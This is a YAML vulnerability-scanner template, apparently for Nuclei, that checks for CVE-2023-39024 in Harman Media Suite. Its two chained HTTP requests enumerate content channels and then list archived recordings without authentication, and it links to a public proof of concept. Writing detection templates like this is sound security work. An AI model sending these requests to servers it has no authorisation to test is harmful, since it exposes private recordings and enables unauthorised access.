id: CVE-2023-39024 info: name: Harman Media Suite <= 4.2.0 - Local File Disclosure author: s4e-io severity: high description: | Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled. reference: - https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC - https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35 - https://mediasuite.harman.com/channel-store metadata: verified: true max-request: 2 vendor: harman product: media-suite fofa-query: "Harman Media Suite" tags: cve,cve2023,harman,media-suite,lfi flow: http(1) && http(2) http: - raw: - | GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")' - 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")' - 'status_code == 200' condition: and internal: true extractors: - type: regex name: channelId group: 1 regex: - '"channelId":"([^"]+)"' internal: true - raw: - | GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body,"callId", "displayName", "duration")' - 'contains(content_type, "application/vnd.plcm.plcm-csc+json")' - 'status_code == 200' condition: and # digest: 4a0a004730450220308de1868effffc01161d060b94953615926778af71ce9944d55b07e741e2019022100c80131e913327d1cfc14e6e0c47f0a283e597346c1cebb079a8ba60f9b0cf843:922c64590222798bb761d5b6d8e72950